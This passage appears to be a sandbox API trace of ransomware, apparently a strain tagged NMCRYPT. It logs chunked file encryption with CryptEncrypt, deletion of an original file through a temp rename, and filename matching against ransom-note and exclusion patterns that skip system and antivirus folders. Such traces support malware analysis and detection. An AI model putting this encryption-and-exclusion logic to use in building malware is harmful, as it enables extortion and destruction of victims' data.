lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.438] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.438] GetLastError () returned 0x0 [0144.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.438] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.438] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.438] GetLastError () returned 0x0 [0144.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.438] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.438] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.438] GetLastError () returned 0x0 [0144.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.439] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.439] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.439] GetLastError () returned 0x0 [0144.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.439] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.439] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.439] GetLastError () returned 0x0 [0144.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.439] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.439] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.439] GetLastError () returned 0x0 [0144.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.439] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.439] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.439] GetLastError () returned 0x0 [0144.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.439] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.439] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.439] GetLastError () returned 0x0 [0144.439] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.439] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.439] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.439] GetLastError () returned 0x0 [0144.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.440] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.440] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.440] GetLastError () returned 0x0 [0144.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.440] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.440] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.440] GetLastError () returned 0x0 [0144.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.440] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.440] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.440] GetLastError () returned 0x0 [0144.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.441] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.441] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.441] GetLastError () returned 0x0 [0144.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.441] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.441] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.441] GetLastError () returned 0x0 [0144.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.441] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.441] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.441] GetLastError () returned 0x0 [0144.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.441] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.441] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.441] GetLastError () returned 0x0 [0144.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.441] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.441] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.441] GetLastError () returned 0x0 [0144.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.441] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.441] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.441] GetLastError () returned 0x0 [0144.441] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.441] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.442] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.442] GetLastError () returned 0x0 [0144.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.442] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.442] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.442] GetLastError () returned 0x0 [0144.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.442] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.442] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.442] GetLastError () returned 0x0 [0144.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.442] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.442] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.442] GetLastError () returned 0x0 [0144.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.442] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.442] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.442] GetLastError () returned 0x0 [0144.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.442] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.442] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.442] GetLastError () returned 0x0 [0144.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.442] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.442] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.442] GetLastError () returned 0x0 [0144.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.544] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 1 [0144.544] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0 [0144.544] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" [0144.544] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0144.544] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA773.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa773.tmp")) returned 0xa773 [0144.545] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA773.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa773.tmp"), dwFlags=0x1) returned 0 [0144.545] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA773.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa773.tmp")) returned 1 [0144.545] CryptDestroyKey (hKey=0x9ad438) returned 1 [0144.545] wcslen (_String="OK") returned 0x2 [0144.545] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0144.545] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0144.545] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0144.545] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0144.545] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0144.545] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.545] PathMatchSpecW (pszFile="FlickLearningWizard.exe", pszSpec="*NMCRYPT") returned 0 [0144.545] PathMatchSpecW (pszFile="FlickLearningWizard.exe", pszSpec="*Recovers your files.html") returned 0 [0144.545] PathMatchSpecW (pszFile="FlickLearningWizard.exe", pszSpec="*.exe") returned 1 [0144.545] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.545] wcscmp (_String1="fr-CA", _String2=".") returned 1 [0144.545] wcscmp (_String1="fr-CA", _String2="..") returned 1 [0144.545] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.546] wcscmp (_String1="fr-FR", _String2=".") returned 1 [0144.546] wcscmp (_String1="fr-FR", _String2="..") returned 1 [0144.546] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.546] wcscmp (_String1="fsdefinitions", _String2=".") returned 1 [0144.546] wcscmp (_String1="fsdefinitions", _String2="..") returned 1 [0144.546] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.546] wcscmp (_String1="he-IL", _String2=".") returned 1 [0144.546] wcscmp (_String1="he-IL", _String2="..") returned 1 [0144.546] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.546] wcscmp (_String1="hr-HR", _String2=".") returned 1 [0144.546] wcscmp (_String1="hr-HR", _String2="..") returned 1 [0144.546] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.546] wcscmp (_String1="hu-HU", _String2=".") returned 1 [0144.546] wcscmp (_String1="hu-HU", _String2="..") returned 1 [0144.546] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*NMCRYPT") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*Recovers your files.html") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*.exe") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*.dll") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*.lnk") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*.bat") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*.ini") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*.msi") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*.scf") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*pagefile.sys*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*NTUSER.DAT*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*AppData*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*\\winrar\\*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*\\Internet Explorer\\*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*\\java\\*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*\\TeamViewer\\*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*\\windows\\*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*\\ESET\\*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*\\AVG\\*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*\\AVIRA\\*") returned 0 [0144.546] 